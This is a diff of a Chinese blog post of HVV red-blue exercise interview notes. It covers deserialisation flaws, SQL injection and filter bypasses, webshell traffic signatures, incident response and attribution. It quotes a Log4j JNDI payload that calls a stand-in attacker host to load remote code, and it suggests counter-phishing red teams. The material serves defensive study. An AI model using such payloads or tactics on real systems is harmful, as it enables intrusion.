11---
2- title : " 2023 Hvv 面试笔记"
2+ title : " 2023 HVV 面试笔记"
3+ summary : " 整理 2023 HVV 面试和安全基础问题笔记,包括 WebSocket、协议升级、常见漏洞和应急响应流程。"
4+ description : " 整理 2023 HVV 面试和安全基础问题笔记,包括 WebSocket、协议升级、常见漏洞和应急响应流程。"
35date : 2023-07-04
46draft : false
7+ categories :
8+ - " security"
9+ tags :
10+ - " hvv"
11+ - " web-security"
12+ - " incident-response"
513---
14+ 整理 2023 HVV 面试和安全基础问题笔记,包括 WebSocket、协议升级和常见攻防知识点。
615
7- # websocket 流量特征
8- 1 . 通常是复用 80和 443 端口,在原有的http协议上生成。upgrade : websocket
16+ <!-- more-->
17+
18+ ## WebSocket 流量特征
19+ 1 . 通常是复用 80和 443 端口,在原有的http协议上生成。upgrade : WebSocket
9202 . 长链接,连接通常保持打开和空闲状态,直到客户端或服务器发送消息,客户端与服务器之间存在定时的ping-pong机制数据交互以保持连接状态
10213 . 客户端带有 Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w== 用于加密
11- 4 . Websocket 多用于聊天或者小包传输场景中
22+ 4 . WebSocket 多用于聊天或者小包传输场景中
1223
13- # IP封禁
24+ ## IP封禁
14251 . 如果有防火墙等设备,推荐在防火墙上封禁IP
15262 . 如果内网沦陷,可上线服务器手动设置IPtbles 防火墙隔离受感染机器
16273 . 同时上报 IP给其他人
17- <!-- more-->
18-
19-
20- # 危险函数
28+ ## 危险函数
2129代码执行: ` eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function `
2230
2331文件读取: ` file_get_contents(),highlight_file(),fopen(),read ` ` file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file() ` 等
2432
2533命令执行:` system(), exec(), shell_exec(), passthru() ,pcntl_exec(),popen(),proc_open() `
2634
2735
28- # Sharo 反序列原理
36+ ## Shiro 反序列原理
2937服务器端对rememberMe中的cookie依次进行base64解密、AES解密和反序列化得到cookie的值对用户进行认证。
3038rememberMe 可以被构造,将恶意代码放入 rememberMe,服务器端解析后就会触发Java反序列化漏洞,进而在目标机器上执行任意命令。
3139漏洞原理:
@@ -35,24 +43,24 @@ rememberMe 可以被构造,将恶意代码放入 rememberMe,服务器端解
3543升级
3644限制rememberMe字段长度
3745
38- # log4j
46+ ## Log4j
3947出网协议 rmi、ldap,
4048对 JNDI 出网协议解析不正确,攻击者在服务器中构造恶意Class 文件,在日志中如果有 JNDI 解析触发错误,如` ${jndi:rmi:http://attacker.com/exp} ` 下载攻击者` class ` 并实例化执行
4149绕过:
4250希腊文字,UPPER,LOWER 等
4351
44- # weblogic
52+ ## WebLogic
4553T3 协议发送反序列化漏洞
4654T3 配合RMI,JDNI 协议发送反序列化漏洞
4755流量特征:开头都是ac ed 00 05,端口:7001 数据包里有 CommonCollections/ysoserial 相关的东西
4856监测:
49- ` nmap script ` 里有` weblogic -t3-info,WebLogic ` 的具体版本号为10.3.6.0以下就行。
57+ ` nmap script ` 里有` WebLogic -t3-info,WebLogic ` 的具体版本号为10.3.6.0以下就行。
5058防御:
5159增加 ` jep290 ` 机制,需要修改JDK 设置
5260jdk版本过低没有JEP290机制下,需要重写 ` resolveClass(resolveClass读取反序列化的类名) ` 来进行反序列化类黑名单过滤。
5361
5462
55- # fastjson
63+ ## Fastjson
5664` Object --> json or json-->Object `
5765
5866反序列化 @type 指定的类时,指定类的 setter 或 getter 被调用导致的命令执行,比如 JDBCRowSetImpl setter dataSourceName 方法,支持RMI远程调用。
6977开启safeMode,-Dfastjson.parser.safeMode=true
7078升级到最新版本1.2.83
7179
72- # 云函数
80+ ## 云函数
7381云函数:是独立运行的代码,托管在腾讯云平台上,可实现批量探测,由于IP数量多,造成溯源难度大,封禁难度大
74821 . 通过观测流量的方法,提取攻击者攻击的端口号,业务系统精细到某个页面某个接口的利用,提取特征,然后根据特征编写防火墙规则
75832 . X-Api-Status
76843 . sh.apigw.tencentcs.com 域名前置
7785
78- # 蜜罐
86+ ## 蜜罐
79871 . 可以模拟真实交互场景
80882 . 捕获攻击者攻击IP,攻击手法,甚至是未公开0day
81893 . 捕获上传的木马以便后续分析,可以大概对攻击者所在的组织特征进行画像
82904 . 可以起到攻击预警监测的作用,帮助及时发现任何攻击活动。
8391
8492
85- # SQL 注入
93+ ## SQL 注入
86941 . 通过报错注入(bczr)(常用函数,updataxml,extractXML ,rand,exp ,squar 等函数)猜表名。
87952 . 构造SQL语句,写入文件到可写入的路径下的可读写文件中,盲注函数(substr,left,right,ascii,char)
88963 . 多次构造注入语句进行多次写入操作,拼接成完整的Payload
89974 . 访问运行
90- ## 注入写文件的条件
98+ ### 注入写文件的条件
91991 . 必须有写入权限
921002 . 查询语句的函数必须要能输出内容到某个文件里,常见的指令有 into outfile,load date file
931013 . 该文件不能为空,且必须是文本文件
941024 . 攻击者必须知道文件在哪里
95- ## SQL 绕过(sqlrg):
103+ ### SQL 绕过(sqlrg):
96104大小写,编码绕过,宽字节绕过,内敛注释绕过,十六进制绕
97105SQL 注入预编译绕过:使用单引号和注释来拼接注入语句。
98- ## SQL 注入防御
106+ ### SQL 注入防御
991071 . 严格规律用户输入语句
1001082 . 使用预编译
1011093 . 站酷分离设计
102- ## SQLmap 流量特征
110+ ### SQLmap 流量特征
1031111 . 大量的SQL查询发生,并且大量的不同规则的Payload反复对同一个页面或者接口查询
1041122 . SQLmap有自己的UA 特征
1051133 . 会在Cookie 字段里发现注入payload
106114
107- # 绕过
115+ ## 绕过
108116文件上传漏洞绕过:
109117前端+后端过滤,后缀名截断,后缀名,MME绕过(修改 Content-Type ibm500、cp875
110118Accept-Encoding gzip
111119截断文件名
112120HTTP PIpeline 分块传输)
113121
114122
115- # 网站被挂马怎么办
123+ ## 网站被挂马怎么办
1161241 . 取证(登录服务器,查看日志异常进程端口号,web页面可疑文件等),处理(删除木马文件,内存马使用专用清除工具,或者手写JVM 拦截器),溯源(入侵IP背景信息,入侵手法,恶意代码相似度归类),记录
117125
118- # 溯源
126+ ## 溯源
119127掌握攻击者的攻击手法,掌握攻击者背后的 IP &域名资产,掌握攻击者的真实身份
120128溯源攻击手法:收集 如 Req/resp,User-Agent,特有的红队工具,钓鱼邮件(LNK、EXE、DOCX)特征,使用过的漏洞。
121129溯源资产:发件服务器操作系统,IP,whos信息,绑定过的域名,DNS记录,回连C2,端口
122130溯源后门:代码逻辑,行为,利用的操作系统漏洞,链接到的二进制库
123131ID号:社交平台,Google,twitter,GitHub,Gitee,StackOverflow等,支付宝,微信
124- # 反制
132+ ## 反制
125133通过对红队的资产展开渗透测试,拿下有些服务
126134蜜罐中诱导红队下载SSL VPN,恶意文档等
127135给红队发送钓鱼邮件等。
128136BUrpsite,扫描器fz,gz炸弹,nmap syn 超时等
129137
130- # FOFA
138+ ## FOFA
131139domain=”qq.com” 搜索根域名带有qq.com的网站。
132140host=”.gov.cn” 从url中搜索”.gov.cn” 搜索要用host作为名称
133141port=”6379” 查找对应“6379”端口的资产
134142ip=”220.181.111.1/24” 查询IP为“220.181.111.1”的C网段资产
135143
136144
137- # 蚁剑、冰蝎,哥斯拉流量特征
138- ## 蚂剑
145+ ## 蚁剑、冰蝎,哥斯拉流量特征
146+ ### 蚁剑
1391471 . User-agent 为 Ant-swa,但是可以修改 request.js 实现
1401482 . 混淆后的流量大部分是 0x 开头的
141149
142- ## 冰蝎
150+ ### 冰蝎
1431511 . Accept 头是 application/xhtml lapplication/xml application/signed- exchange 弱特征
1441522 . Content-Type: application/octet-stream 强特征,并且伴随着大量的Content-Type: applicationo/ctet-stream,很少使用
1451533 . UserAgent 内置16 个,随机选择,弱特征
146154
147- ## 哥斯拉
155+ ### 哥斯拉
148156动态特征
1491571 . 监控 JVM 拦截反射类 javax.crypto.Cipher.getInstance(“AES”)
1501582 . C# 拦截 System.Security.Cryptography.RijndaelManaged()
@@ -157,9 +165,9 @@ ip=”220.181.111.1/24” 查询IP为“220.181.111.1”的C网段资产
1571655 . 响应特征,把 32 位 MD5 拆开,16 位 md5 + base64 + 后 16 位 md5, md5 字符集 0-9A-F 匹配
158166
159167
160- # 应急响应流程
168+ ## 应急响应流程
161169应急响应流程:准备-监测-抑制-根除-恢复-编写报告
162- # 上机排查
170+ ## 上机排查
163171首先确定是否为误报,分析抓到的Payload,如果是:
1641721 . 定位是哪台机器,可以在安全设备上查看
1651732 . 定位与这台机器互相连接的机器,大致确定可能的受攻击范围
@@ -170,7 +178,7 @@ ip=”220.181.111.1/24” 查询IP为“220.181.111.1”的C网段资产
1701786 . 编写产出监测报告
171179如果不是,及时更新防火墙规则,以免才吃
172180
173- # 应急响应案例
181+ ## 应急响应案例
174182某公司十余台服务器感染勒索病毒,文件遭勒索加密,因
175183此向奇安信安服团队发起应急响应请求,查询中毒原因。
176184应急人员抵达现场后,查看加密文件后缀及勒索病毒界面,判断该病毒
@@ -220,7 +228,7 @@ ip=”220.181.111.1/24” 查询IP为“220.181.111.1”的C网段资产
220228服务器Web日志分析发现攻击者利用TRS漏洞,植入WebShell后门,攻击
221229IP经调研后发现为内部Redis服务器,通过对Redis服务器进行分析发现该
222230机器存在RootKit程序,该程序会自动连接到攻击者服务器,植入时间为:
223- 2017/03/17 ,且在该机器上发现了攻击者利用Redis未授权获得本机SSH管
231+ 2017/03/17,且在该机器上发现了攻击者利用Redis未授权获得本机SSH管
224232理权限的行为和内网扫描行为。
225233综上,攻击者通过利用Redis未授权漏洞获取了Redis服务器本机SSH
226234管理权限,并对同网段进行扫描,发现TRS服务器存在漏洞,并对该漏洞进
@@ -229,7 +237,7 @@ IP经调研后发现为内部Redis服务器,通过对Redis服务器进行分
229237器,植入后门文件,并在官网首页文件中插入恶意代码
230238
231239
232- # Windows 攻防
240+ ## Windows 攻防
233241隐蔽的影子账户可以在注册表里Sam里看到。
234242Systeminfo可以查看系统信息并展示系统补丁信息
235243日志 Windows审核策略,事件查看器,有日志筛选框
0 commit comments